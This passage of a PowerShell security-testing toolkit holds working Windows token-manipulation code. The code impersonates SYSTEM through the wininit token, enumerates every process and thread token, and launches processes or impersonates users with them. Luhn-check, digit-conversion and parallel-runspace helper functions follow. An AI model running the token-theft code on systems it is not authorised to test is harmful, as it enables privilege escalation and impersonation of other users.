\"$FunctionName failed. Error code: $ErrorCode\"\n            }\n\n            #Free StartupInfo memory and ProcessInfo memory\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($StartupInfoPtr)\n            $StartupInfoPtr = [Intptr]::Zero\n            [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcessInfoPtr)\n            $ProcessInfoPtr = [IntPtr]::Zero\n            [System.Runtime.InteropServices.Marshal]::ZeroFreeGlobalAllocUnicode($ProcessNamePtr)\n            $ProcessNamePtr = [IntPtr]::Zero\n\n            #Close handle for the token duplicated with DuplicateTokenEx\n            $Success = $CloseHandle.Invoke($NewHToken)\n            $NewHToken = [IntPtr]::Zero\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Warning \"CloseHandle failed to close NewHToken. ErrorCode: $ErrorCode\"\n            }\n        }\n    }\n\n\n    function Free-AllTokens\n    {\n        Param(\n            [Parameter(Position=0, Mandatory=$true)]\n            [PSObject[]]\n            $TokenInfoObjs\n        )\n\n        foreach ($Obj in $TokenInfoObjs)\n        {\n            $Success = $CloseHandle.Invoke($Obj.hToken)\n            if (-not $Success)\n            {\n                $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n                Write-Verbose \"Failed to close token handle in Free-AllTokens. ErrorCode: $ErrorCode\"\n            }\n            $Obj.hToken = [IntPtr]::Zero\n        }\n    }\n\n\n    #Enumerate all tokens on the system. Returns an array of objects with the token and information about the token.\n    function Enum-AllTokens\n    {\n        $AllTokens = @()\n\n        #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token.\n        #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token.\n        $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id\n        if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))\n        {\n            Write-Warning \"Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens\"\n        }\n\n        if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero)\n        {\n            $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null\n            $systemTokenInfo = $null\n        }\n\n        $ProcessIds = get-process | where {$_.name -inotmatch \"^csrss$\" -and $_.name -inotmatch \"^system$\" -and $_.id -ne 0}\n\n        #Get all tokens\n        foreach ($Process in $ProcessIds)\n        {\n            $PrimaryTokenInfo = (Get-PrimaryToken -ProcessId $Process.Id -FullPrivs)\n\n            #If a process is a protected process, it's primary token cannot be obtained. Don't try to enumerate it.\n            if ($PrimaryTokenInfo -ne $null)\n            {\n                [IntPtr]$hToken = [IntPtr]$PrimaryTokenInfo.hProcToken\n\n                if ($hToken -ne [IntPtr]::Zero)\n                {\n                    #Get the LUID corrosponding to the logon\n                    $ReturnObj = Get-TokenInformation -hToken $hToken\n                    if ($ReturnObj -ne $null)\n                    {\n                        $ReturnObj | Add-Member -MemberType NoteProperty -Name ProcessId -Value $Process.Id\n\n                        $AllTokens += $ReturnObj\n                    }\n                }\n                else\n                {\n                    Write-Warning \"Couldn't retrieve token for Process: $($Process.Name). ProcessId: $($Process.Id)\"\n                }\n\n                foreach ($Thread in $Process.Threads)\n                {\n                    $ThreadTokenInfo = Get-ThreadToken -ThreadId $Thread.Id\n                    [IntPtr]$hToken = ($ThreadTokenInfo.hThreadToken)\n\n                    if ($hToken -ne [IntPtr]::Zero)\n                    {\n                        $ReturnObj = Get-TokenInformation -hToken $hToken\n                        if ($ReturnObj -ne $null)\n                        {\n                            $ReturnObj | Add-Member -MemberType NoteProperty -Name ThreadId -Value $Thread.Id\n                    \n                            $AllTokens += $ReturnObj\n                        }\n                    }\n                }\n            }\n        }\n\n        return $AllTokens\n    }\n\n\n    function Invoke-RevertToSelf\n    {\n        Param(\n            [Parameter(Position=0)]\n            [Switch]\n            $ShowOutput\n        )\n\n        $Success = $RevertToSelf.Invoke()\n\n        if ($ShowOutput)\n        {\n            if ($Success)\n            {\n                Write-Output \"RevertToSelf was successful. Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n            else\n            {\n                Write-Output \"RevertToSelf failed. Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n        }\n    }\n\n\n    #Main function\n    function Main\n    {   \n        #If running in session 0, force NoUI\n        if ([System.Diagnostics.Process]::GetCurrentProcess().SessionId -eq 0)\n        {\n            Write-Verbose \"Running in Session 0, forcing NoUI (processes in Session 0 cannot have a UI)\"\n            $NoUI = $true\n        }\n\n        if ($PsCmdlet.ParameterSetName -ieq \"RevToSelf\")\n        {\n            Invoke-RevertToSelf -ShowOutput\n        }\n        elseif ($PsCmdlet.ParameterSetName -ieq \"CreateProcess\" -or $PsCmdlet.ParameterSetName -ieq \"ImpersonateUser\")\n        {\n            $AllTokens = Enum-AllTokens\n            \n            #Select the token to use\n            [IntPtr]$hToken = [IntPtr]::Zero\n            $UniqueTokens = (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser\n            if ($Username -ne $null -and $Username -ne '')\n            {\n                if ($UniqueTokens.ContainsKey($Username))\n                {\n                    $hToken = $UniqueTokens[$Username].hToken\n                    Write-Verbose \"Selecting token by username\"\n                }\n                else\n                {\n                    Write-Error \"A token belonging to the specified username was not found. Username: $($Username)\" -ErrorAction Stop\n                }\n            }\n            elseif ( $ProcessId -ne $null -and $ProcessId -ne 0)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $ProcessId)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by ProcessID\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to ProcessId $($ProcessId) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            elseif ($ThreadId -ne $null -and $ThreadId -ne 0)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ThreadId) -and $Token.ThreadId -eq $ThreadId)\n                    {\n                        $hToken = $Token.hToken\n                        Write-Verbose \"Selecting token by ThreadId\"\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to ThreadId $($ThreadId) could not be found. Either the thread doesn't exist or the thread is in a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            elseif ($Process -ne $null)\n            {\n                foreach ($Token in $AllTokens)\n                {\n                    if (($Token | Get-Member ProcessId) -and $Token.ProcessId -eq $Process.Id)\n                    {\n                        $hToken = $Token.hToken\n\n                        if($Instance){\n                            Write-Verbose \"$Instance : Selecting token by Process object\"\n                        }else{\n                            Write-Verbose \"Selecting token by Process object\"\n                        }\n                    }\n                }\n\n                if ($hToken -eq [IntPtr]::Zero)\n                {\n                    Write-Error \"A token belonging to Process $($Process.Name) ProcessId $($Process.Id) could not be found. Either the process doesn't exist or it is a protected process and cannot be opened.\" -ErrorAction Stop\n                }\n            }\n            else\n            {\n                Write-Error \"Must supply a Username, ProcessId, ThreadId, or Process object\"  -ErrorAction Stop\n            }\n\n            #Use the token for the selected action\n            if ($PsCmdlet.ParameterSetName -ieq \"CreateProcess\")\n            {\n                if (-not $NoUI)\n                {\n                    Set-DesktopACLs\n                }\n\n                Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru\n\n                Invoke-RevertToSelf\n            }\n            elseif ($ImpersonateUser)\n            {\n                Invoke-ImpersonateUser -hToken $hToken | Out-Null\n                Write-Output \"Running As: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n            }\n\n            Free-AllTokens -TokenInfoObjs $AllTokens\n        }\n        elseif ($PsCmdlet.ParameterSetName -ieq \"WhoAmI\")\n        {\n            Write-Output \"$([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n        }\n        else #Enumerate tokens\n        {\n            $AllTokens = Enum-AllTokens\n\n            if ($PsCmdlet.ParameterSetName -ieq \"ShowAll\")\n            {\n                Write-Output $AllTokens\n            }\n            else\n            {\n                Write-Output (Get-UniqueTokens -AllTokens $AllTokens).TokenByUser.Values\n            }\n\n            Invoke-RevertToSelf\n\n            Free-AllTokens -TokenInfoObjs $AllTokens\n        }\n    }\n\n\n    #Start the main function\n    Main\n}\n\n\n# -------------------------------------------\n# Function: Test-IsLuhnValid\n# -------------------------------------------\n# Author: ktaranov\n# Source: https://communary.net/2016/02/19/the-luhn-algorithm/\nfunction Test-IsLuhnValid\n{\n    <#\n            .SYNOPSIS\n            Valdidate a number based on the Luhn Algorithm.\n            .DESCRIPTION\n            This function uses the Luhn algorithm to validate a number that includes\n            the Luhn checksum digit.\n            .EXAMPLE\n            Test-IsLuhnValid -Number 1234567890123452\n            This will validate whether the number is valid according to the Luhn Algorithm.\n            .INPUTS\n            System.UInt64\n            .OUTPUTS\n            System.Boolean\n            .NOTES\n            Author: ØYVIND KALLSTAD\n            Date: 19.02.2016\n            Version: 1.0\n            Dependencies: Get-LuhnCheckSum, ConvertTo-Digits\n            .LINKS\n            https://en.wikipedia.org/wiki/Luhn_algorithm\n            https://communary.wordpress.com/\n            https://github.com/gravejester/Communary.ToolBox\n    #>\n    [CmdletBinding()]\n    param (\n        [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline = $true)]\n        [uint64]$Number\n    )\n\n    $numberDigits = ConvertTo-Digits -Number $Number\n    $checksumDigit = $numberDigits[-1]\n    $numberWithoutChecksumDigit = $numberDigits[0..($numberDigits.Count - 2)] -join ''\n    $checksum = Get-LuhnCheckSum -Number $numberWithoutChecksumDigit\n    $NumCount = ([string]$numberWithoutChecksumDigit).Length\n\n    if ((($checksum + $checksumDigit) % 10) -eq 0 -and $NumCount -ge 12)\n    {\n        Write-Output -InputObject $true\n    }\n    else\n    {\n        Write-Output -InputObject $false\n    }\n}\n\n\n# -------------------------------------------\n# Function: ConvertTo-Digits\n# -------------------------------------------\n# Author: ØYVIND KALLSTAD\n# Source: https://communary.net/2016/02/19/the-luhn-algorithm/\nfunction ConvertTo-Digits\n{\n    <#\n            .SYNOPSIS\n            Convert an integer into an array of bytes of its individual digits.\n            .DESCRIPTION\n            Convert an integer into an array of bytes of its individual digits.\n            .EXAMPLE\n            ConvertTo-Digits 145\n            .INPUTS\n            System.UInt64\n            .LINK\n            https://communary.wordpress.com/\n            https://github.com/gravejester/Communary.ToolBox\n            .NOTES\n            Author: ØYVIND KALLSTAD\n            Date: 09.05.2015\n            Version: 1.0\n    #>\n    [OutputType([System.Byte[]])]\n    [CmdletBinding()]\n    param(\n        [Parameter(Position = 0, Mandatory = $true, ValueFromPipeline = $true)]\n        [uint64]$Number\n    )\n    $n = $Number\n    $numberOfDigits = 1 + [convert]::ToUInt64([math]::Floor(([math]::Log10($n))))\n    $digits = New-Object -TypeName Byte[] -ArgumentList $numberOfDigits\n    for ($i = ($numberOfDigits - 1); $i -ge 0; $i--)\n    {\n        $digit = $n % 10\n        $digits[$i] = $digit\n        $n = [math]::Floor($n / 10)\n    }\n    Write-Output -InputObject $digits\n}\n\n\n# -------------------------------------------\n# Function: Invoke-Parallel\n# -------------------------------------------\n# Author: RamblingCookieMonster\n# Source: https://github.com/RamblingCookieMonster/Invoke-Parallel\n# Notes: Added \"ImportSessionFunctions\" to import custom functions from the current session into the runspace pool.\nfunction Invoke-Parallel\n{\n    <#\n            .SYNOPSIS\n            Function to control parallel processing using runspaces\n\n            .DESCRIPTION\n            Function to control parallel processing using runspaces\n\n            Note that each runspace will not have access to variables and commands loaded in your session or in other runspaces by default.\n            This behaviour can be changed with parameters.\n\n            .PARAMETER ScriptFile\n            File to run against all input objects.  Must include parameter to take in the input object, or use $args.  Optionally, include parameter to take in parameter.  Example: C:\\script.ps1\n\n            .PARAMETER ScriptBlock\n            Scriptblock to run against all computers.\n\n            You may use $Using:<Variable> language in PowerShell 3 and later.\n\n            The parameter block is added for you, allowing behaviour similar to foreach-object:\n            Refer to the input object as $_.\n            Refer to the parameter parameter as $parameter\n\n            .PARAMETER InputObject\n            Run script against these specified objects.\n\n            .PARAMETER Parameter\n            This object is passed to every script block.  You can use it to pass information to the script block; for example, the path to a logging folder\n\n            Reference this object as $parameter if using the scriptblock parameterset.\n\n            .PARAMETER ImportVariables\n            If specified, get user session variables and add them to the initial session state\n\n            .PARAMETER ImportModules\n            If specified, get loaded modules and pssnapins, add them to the initial session state\n\n            .PARAMETER Throttle\n            Maximum number of threads to run at a single time.\n\n            .PARAMETER SleepTimer\n            Milliseconds to sleep after checking for completed runspaces and in a few other spots.  I would not recommend dropping below 200 or increasing above 500\n\n            .PARAMETER RunspaceTimeout\n            Maximum time in seconds a single thread can run.  If execution of your code takes longer than this, it is disposed.  Default: 0 (seconds)\n\n            WARNING:  Using this parameter requires that maxQueue be set to throttle (it will be by default) for accurate timing.  Details here:\n            http://gallery.technet.microsoft.com/Run-Parallel-Parallel-377fd430\n\n            .PARAMETER NoCloseOnTimeout\n            Do not dispose of timed out tasks or attempt to close the runspace if threads have timed out. This will prevent the script from hanging in certain situations where threads become non-responsive, at the expense of leaking memory within the PowerShell host.\n\n            .PARAMETER MaxQueue\n            Maximum number of powershell instances to add to runspace pool.  If this is higher than $throttle, $timeout will be inaccurate\n\n            If this is equal or less than throttle, there will be a performance impact\n\n            The default value is $throttle times 3, if $runspaceTimeout is not specified\n            The default value is $throttle, if $runspaceTimeout is specified\n\n            .PARAMETER LogFile\n            Path to a file where we can log results, including run time for each thread, whether it completes, completes with errors, or times out.\n\n            .PARAMETER Quiet\n            Disable progress bar.\n\n            .EXAMPLE\n            Each example uses Test-ForPacs.ps1 which includes the following code:\n            param($computer)\n\n            if(test-connection $computer -count 1 -quiet -BufferSize 16){\n            $object = [pscustomobject] @{\n            Computer=$computer;\n            Available=1;\n            Kodak=$(\n            if((test-path \"\\\\$computer\\c$\\users\\public\\desktop\\Kodak Direct View Pacs.url\") -or (test-path \"\\\\$computer\\c$\\documents and settings\\all users\n\n            \\desktop\\Kodak Direct View Pacs.url\") ){\"1\"}else{\"0\"}\n            )\n            }\n            }\n            else{\n            $object = [pscustomobject] @{\n            Computer=$computer;\n            Available=0;\n            Kodak=\"NA\"\n            }\n            }\n\n            $object\n\n            .EXAMPLE\n            Invoke-Parallel -scriptfile C:\\public\\Test-ForPacs.ps1 -inputobject $(get-content C:\\pcs.txt) -runspaceTimeout 10 -throttle 10\n\n            Pulls list of PCs from C:\\pcs.txt,\n            Runs Test-ForPacs against each\n            If any query takes longer than 10 seconds, it is disposed\n            Only run 10 threads at a time\n\n            .EXAMPLE\n            Invoke-Parallel -scriptfile C:\\public\\Test-ForPacs.ps1 -inputobject c-is-ts-91, c-is-ts-95\n\n            Runs against c-is-ts-91, c-is-ts-95 (-computername)\n            Runs Test-ForPacs against each\n\n            .EXAMPLE\n            $stuff = [pscustomobject] @{\n            ContentFile = \"windows\\system32\\drivers\\etc\\hosts\"\n            Logfile = \"C:\\temp\\log.txt\"\n            }\n\n            $computers | Invoke-Parallel -parameter $stuff {\n            $contentFile = join-path \"\\\\$_\\c$\" $parameter.contentfile\n            Get-Content $contentFile |\n            set-content $parameter.logfile\n            }\n\n            This example uses the parameter argument.  This parameter is a single object.  To pass multiple items into the script block, we create a custom object (using a PowerShell v3 language) with properties we want to pass in.\n\n            Inside the script block, $parameter is used to reference this parameter object.  This example sets a content file, gets content from that file, and sets it to a predefined log file.\n\n            .EXAMPLE\n            $test = 5\n            1..2 | Invoke-Parallel -ImportVariables {$_ * $test}\n\n            Add variables from the current session to the session state.  Without -ImportVariables $Test would not be accessible\n\n            .EXAMPLE\n            $test = 5\n            1..2 | Invoke-Parallel {$_ * $Using:test}\n\n            Reference a variable from the current session with the $Using:<Variable> syntax.  Requires PowerShell 3 or later. Note that -ImportVariables parameter is no longer necessary.\n\n            .FUNCTIONALITY\n            PowerShell Language\n\n            .NOTES\n            Credit to Boe Prox for the base runspace code and $Using implementation\n            http://learn-powershell.net/2012/05/10/speedy-network-information-query-using-powershell/\n            http://gallery.technet.microsoft.com/scriptcenter/Speedy-Network-Information-5b1406fb#content\n            https://github.com/proxb/PoshRSJob/\n\n            Credit to T Bryce Yehl for the Quiet and NoCloseOnTimeout implementations\n\n            Credit to Sergei Vorobev for the many ideas and contributions that have improved functionality, reliability, and ease of use\n\n            .LINK\n            https://github.com/RamblingCookieMonster/Invoke-Parallel\n    #>\n    [cmdletbinding(DefaultParameterSetName = 'ScriptBlock')]\n    Param (\n        [Parameter(Mandatory = $false,position = 0,ParameterSetName = 'ScriptBlock')]\n        [System.Management.Automation.ScriptBlock]$ScriptBlock,\n\n        [Parameter(Mandatory = $false,ParameterSetName = 'ScriptFile')]\n        [ValidateScript({\n                    Test-Path $_ -PathType leaf\n        })]\n        $ScriptFile,\n\n        [Parameter(Mandatory = $true,ValueFromPipeline = $true)]\n        [Alias('CN','__Server','IPAddress','Server','ComputerName')]\n        [PSObject]$InputObject,\n\n        [PSObject]$Parameter,\n\n        [switch]$ImportSessionFunctions,\n\n        [switch]$ImportVariables,\n\n        [switch]$ImportModules,\n\n        [int]$Throttle = 20,\n\n        [int]$SleepTimer = 200,\n\n        [int]$RunspaceTimeout = 0,\n\n        [switch]$NoCloseOnTimeout = $false,\n\n        [int]$MaxQueue,\n\n        [validatescript({\n                    Test-Path (Split-Path -Path $_ -Parent)\n        })]\n        [string]$LogFile = 'C:\\temp\\log.log',\n\n        [switch] $Quiet = $false\n    )\n\n    Begin {\n\n        #No max queue specified?  Estimate one.\n        #We use the script scope to resolve an odd PowerShell 2 issue where MaxQueue isn't seen later in the function\n        if( -not $PSBoundParameters.ContainsKey('MaxQueue') )\n        {\n            if($RunspaceTimeout -ne 0)\n            {\n                $script:MaxQueue = $Throttle\n            }\n            else\n            {\n                $script:MaxQueue = $Throttle * 3\n            }\n        }\n        else\n        {\n            $script:MaxQueue = $MaxQueue\n        }\n\n        #Write-Verbose \"Throttle: '$throttle' SleepTimer '$sleepTimer' runSpaceTimeout '$runspaceTimeout' maxQueue '$maxQueue' logFile '$logFile'\"\n\n        #If they want to import variables or modules, create a clean runspace, get loaded items, use those to exclude items\n        if ($ImportVariables -or $ImportModules)\n        {\n            $StandardUserEnv = [powershell]::Create().addscript({\n                    #Get modules and snapins in this clean runspace\n                    $Modules = Get-Module | Select-Object -ExpandProperty Name\n                    $Snapins = Get-PSSnapin | Select-Object -ExpandProperty Name\n\n                    #Get variables in this clean runspace\n                    #Called last to get vars like $? into session\n                    $Variables = Get-Variable | Select-Object -ExpandProperty Name\n\n                    #Return a hashtable where we can access each.\n                    @{\n                        Variables = $Variables\n                        Modules   = $Modules\n                        Snapins   = $Snapins\n                    }\n            }).invoke()[0]\n\n            if ($ImportVariables)\n            {\n                #Exclude common parameters, bound parameters, and automatic variables\n                Function _temp\n                {\n                    [cmdletbinding()] param()\n                }\n                $VariablesToExclude = @( (Get-Command _temp | Select-Object -ExpandProperty parameters).Keys + $PSBoundParameters.Keys + $StandardUserEnv.Variables )\n                #Write-Verbose \"Excluding variables $( ($VariablesToExclude | sort ) -join \", \")\"\n\n                # we don't use 'Get-Variable -Exclude', because it uses regexps.\n                # One of the veriables that we pass is '$?'.\n                # There could be other variables with such problems.\n                # Scope 2 required if we move to a real module\n                $UserVariables = @( Get-Variable | Where-Object -FilterScript {\n                        -not ($VariablesToExclude -contains $_.Name)\n                } )\n                #Write-Verbose \"Found variables to import: $( ($UserVariables | Select -expandproperty Name | Sort ) -join \", \" | Out-String).`n\"\n            }\n\n            if ($ImportModules)\n            {\n                $UserModules = @( Get-Module |\n                    Where-Object -FilterScript {\n                        $StandardUserEnv.Modules -notcontains $_.Name -and (Test-Path -Path $_.Path -ErrorAction SilentlyContinue)\n                    } |\n                Select-Object -ExpandProperty Path )\n                $UserSnapins = @( Get-PSSnapin |\n                    Select-Object -ExpandProperty Name |\n                    Where-Object -FilterScript {\n                        $StandardUserEnv.Snapins -notcontains $_\n                } )\n            }\n        }\n\n        #region functions\n\n        Function Get-RunspaceData\n        {\n            [cmdletbinding()]\n            param( [switch]$Wait )\n\n            #loop through runspaces\n            #if $wait is specified, keep looping until all complete\n            Do\n            {\n                #set more to false for tracking completion\n                $more = $false\n\n                #Progress bar if we have inputobject count (bound parameter)\n                if (-not $Quiet)\n                {\n                    Write-Progress  -Activity 'Running Query' -Status 'Starting threads'`\n                    -CurrentOperation \"$startedCount threads defined - $totalCount input objects - $script:completedCount input objects processed\"`\n                    -PercentComplete $( Try\n                        {\n                            $script:completedCount / $totalCount * 100\n                        }\n                        Catch\n                        {\n                            0\n                        }\n                    )\n                }\n\n                #run through each runspace.\n                Foreach($runspace in $runspaces)\n                {\n                    #get the duration - inaccurate\n                    $currentdate = Get-Date\n                    $runtime = $currentdate - $runspace.startTime\n                    $runMin = [math]::Round( $runtime.totalminutes ,2 )\n\n                    #set up log object\n                    $log = '' | Select-Object -Property Date, Action, Runtime, Status, Details\n                    $log.Action = \"Removing:'$($runspace.object)'\"\n                    $log.Date = $currentdate\n                    $log.Runtime = \"$runMin minutes\"\n\n                    #If runspace completed, end invoke, dispose, recycle, counter++\n                    If ($runspace.Runspace.isCompleted)\n                    {\n                        $script:completedCount++\n\n                        #check if there were errors\n                        if($runspace.powershell.Streams.Error.Count -gt 0)\n                        {\n                            #set the logging info and move the file to completed\n                            $log.status = 'CompletedWithErrors'\n                            #Write-Verbose ($log | ConvertTo-Csv -Delimiter \";\" -NoTypeInformation)[1]\n                            foreach($ErrorRecord in $runspace.powershell.Streams.Error)\n                            {\n                                Write-Error -ErrorRecord $ErrorRecord\n                            }\n                        }\n                        else\n                        {\n                            #add logging details and cleanup\n                            $log.status = 'Completed'\n                            #Write-Verbose ($log | ConvertTo-Csv -Delimiter \";\" -NoTypeInformation)[1]\n                        }\n\n                        #everything is logged, clean up the runspace\n                        $runspace.powershell.EndInvoke($runspace.Runspace)\n                        $runspace.powershell.dispose()\n                        $runspace.Runspace = $null\n                        $runspace.powershell = $null\n                    }\n\n                    #If runtime exceeds max, dispose the runspace\n                    ElseIf ( $RunspaceTimeout -ne 0 -and $runtime.totalseconds -gt $RunspaceTimeout)\n                    {\n                        $script:completedCount++\n                        $timedOutTasks = $true\n\n                        #add logging details and cleanup\n                        $log.status = 'TimedOut'\n                        #Write-Verbose ($log | ConvertTo-Csv -Delimiter \";\" -NoTypeInformation)[1]\n                        Write-Error -Message \"Runspace timed out at $($runtime.totalseconds) seconds for the object:`n$($runspace.object | Out-String)\"\n\n                        #Depending on how it hangs, we could still get stuck here as dispose calls a synchronous method on the powershell instance\n                        if (!$NoCloseOnTimeout)\n                        {\n                            $runspace.powershell.dispose()\n                        }\n                        $runspace.Runspace = $null\n                        $runspace.powershell = $null\n                        $completedCount++\n                    }\n\n                    #If runspace isn't null set more to true\n                    ElseIf ($runspace.Runspace -ne $null )\n                    {\n                        $log = $null\n                        $more = $true\n                    }\n\n                    #log the results if a log file was indicated\n                    <#\n                            if($logFile -and $log){\n                            ($log | ConvertTo-Csv -Delimiter \";\" -NoTypeInformation)[1] | out-file $LogFile -append\n                            }\n                    #>\n                }\n\n                #Clean out unused runspace jobs\n                $temphash = $runspaces.clone()\n                $temphash |\n                Where-Object -FilterScript {\n                    $_.runspace -eq $null\n                } |\n                ForEach-Object -Process {\n                    $runspaces.remove($_)\n                }\n\n                #sleep for a bit if we will loop again\n                if($PSBoundParameters['Wait'])\n                {\n                    Start-Sleep -Milliseconds $SleepTimer\n                }\n\n                #Loop again only if -wait parameter and there are more runspaces to process\n            }\n            while ($more -and $PSBoundParameters['Wait'])\n\n            #End of runspace function\n        }\n\n        #endregion functions\n\n        #region Init\n\n        if($PSCmdlet.ParameterSetName -eq 'ScriptFile')\n        {\n            $ScriptBlock = [scriptblock]::Create( $(Get-Content $ScriptFile | Out-String) )\n        }\n        elseif($PSCmdlet.ParameterSetName -eq 'ScriptBlock')\n        {\n            #Start building parameter names for the param block\n            [string[]]$ParamsToAdd = '$_'\n            if( $PSBoundParameters.ContainsKey('Parameter') )\n            {\n                $ParamsToAdd += '$Parameter'\n            }\n\n            $UsingVariableData = $null\n\n\n            # This code enables $Using support through the AST.\n            # This is entirely from  Boe Prox, and his https://github.com/proxb/PoshRSJob module; all credit to Boe!\n\n            if($PSVersionTable.PSVersion.Major -gt 2)\n            {\n                #Extract using references\n                $UsingVariables = $ScriptBlock.ast.FindAll({\n                        $args[0] -is [System.Management.Automation.Language.UsingExpressionAst]\n                },$true)\n\n                If ($UsingVariables)\n                {\n                    $List = New-Object -TypeName 'System.Collections.Generic.List`1[System.Management.Automation.Language.VariableExpressionAst]'\n                    ForEach ($Ast in $UsingVariables)\n                    {\n                        [void]$List.Add($Ast.SubExpression)\n                    }\n\n                    $UsingVar = $UsingVariables |\n                    Group-Object -Property SubExpression |\n                    ForEach-Object -Process {\n                        $_.Group |\n                        Select-Object -First 1\n                    }\n\n                    #Extract the name, value, and create replacements for each\n                    $UsingVariableData = ForEach ($Var in $UsingVar)\n                    {\n                        Try\n                        {\n                            $Value = Get-Variable -Name $Var.SubExpression.VariablePath.UserPath -ErrorAction Stop\n                            [pscustomobject]@{\n                                Name       = $Var.SubExpression.Extent.Text\n                                Value      = $Value.Value\n                                NewName    = ('$__using_{0}' -f $Var.SubExpression.VariablePath.UserPath)\n                                NewVarName = ('__using_{0}' -f $Var.SubExpression.VariablePath.UserPath)\n                            }\n                        }\n                        Catch\n                        {\n                            Write-Error -Message \"$($Var.SubExpression.Extent.Text) is not a valid Using: variable!\"\n                        }\n                    }\n                    $ParamsToAdd += $UsingVariableData | Select-Object -ExpandProperty NewName -Unique\n\n                    $NewParams = $UsingVariableData.NewName -join ', '\n                    $Tuple = [Tuple]::Create($List, $NewParams)\n                    $bindingFlags = [Reflection.BindingFlags]'Default,NonPublic,Instance'\n                    $GetWithInputHandlingForInvokeCommandImpl = ($ScriptBlock.ast.gettype().GetMethod('GetWithInputHandlingForInvokeCommandImpl',$bindingFlags))\n\n                    $StringScriptBlock = $GetWithInputHandlingForInvokeCommandImpl.Invoke($ScriptBlock.ast,@($Tuple))\n\n                    $ScriptBlock = [scriptblock]::Create($StringScriptBlock)\n\n                    #Write-Verbose $StringScriptBlock\n                }\n            }\n\n            $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock(\"param($($ParamsToAdd -Join ', '))`r`n\" + $ScriptBlock.ToString())\n        }\n        else\n        {\n            Throw 'Must provide ScriptBlock or ScriptFile'\n            Break\n        }\n\n        Write-Debug -Message \"`$ScriptBlock: $($ScriptBlock | Out-String)\"\n        Write-Verbose -Message 'Creating runspace pool and session states'\n\n\n        #If specified, add variables and modules/snapins to session state\n        $sessionstate = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()\n        if ($ImportVariables)\n        {\n            if($UserVariables.count -gt 0)\n            {\n                foreach($Variable in $UserVariables)\n                {\n                    $sessionstate.Variables.Add( (New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Variable.Name, $Variable.Value, $null) )\n                }\n            }\n        }\n        if ($ImportModules)\n        {\n            if($UserModules.count -gt 0)\n            {\n                foreach($ModulePath in $UserModules)\n                {\n                    $sessionstate.ImportPSModule($ModulePath)\n                }\n            }\n            if($UserSnapins.count -gt 0)\n            {\n                foreach($PSSnapin in $UserSnapins)\n                {\n                    [void]$sessionstate.ImportPSSnapIn($PSSnapin, [ref]$null)\n                }\n            }\n        }\n\n        # --------------------------------------------------\n        #region - Import Session Functions\n        # --------------------------------------------------\n        # Import functions from the current session into the RunspacePool sessionstate\n\n        if($ImportSessionFunctions)\n        {\n            # Import all session functions into the runspace session state from the current one\n            Get-ChildItem -Path Function:\\ |\n            Where-Object -FilterScript {\n                $_.name -notlike '*:*'\n            } |\n            Select-Object -Property name -ExpandProperty name |\n            ForEach-Object -Process {\n                # Get the function code\n                $Definition = Get-Content -Path \"function:\\$_\" -ErrorAction Stop\n\n                # Create a sessionstate function with the same name and code\n                $SessionStateFunction = New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList \"$_\", $Definition\n\n                # Add the function to the session state\n                $sessionstate.Commands.Add($SessionStateFunction)\n            }\n        }\n        #endregion\n\n        #Create runspace pool\n        $runspacepool = [runspacefactory]::CreateRunspacePool(1, $Throttle, $sessionstate, $Host)\n        $runspacepool.Open()\n\n        #Write-Verbose \"Creating empty collection to hold runspace jobs\"\n        $Script:runspaces = New-Object -TypeName System.Collections.ArrayList\n\n        #If inputObject is bound get a total count and set bound to true\n        $bound = $PSBoundParameters.keys -contains 'InputObject'\n        if(-not $bound)\n        {\n            [System.Collections.ArrayList]$allObjects = @()\n        }\n\n        <#\n                #Set up log file if specified\n                if( $LogFile ){\n                New-Item -ItemType file -path $logFile -force | Out-Null\n                (\"\" | Select Date, Action, Runtime, Status, Details | ConvertTo-Csv -NoTypeInformation -Delimiter \";\")[0] | Out-File $LogFile\n                }\n\n                #write initial log entry\n                $log = \"\" | Select Date, Action, Runtime, Status, Details\n                $log.Date = Get-Date\n                $log.Action = \"Batch processing started\"\n                $log.Runtime = $null\n                $log.Status = \"Started\"\n                $log.Details = $null\n                if($logFile) {\n                ($log | convertto-csv -Delimiter \";\" -NoTypeInformation)[1] | Out-File $LogFile -Append\n                }\n        #>\n        $timedOutTasks = $false\n\n        #endregion INIT\n    }\n\n    Process {\n\n        #add piped objects to all objects or set all objects to bound input object parameter\n        if($bound)\n        {\n            $allObjects = $InputObject\n        }\n        Else\n        {\n            [void]$allObjects.add( $InputObject )\n    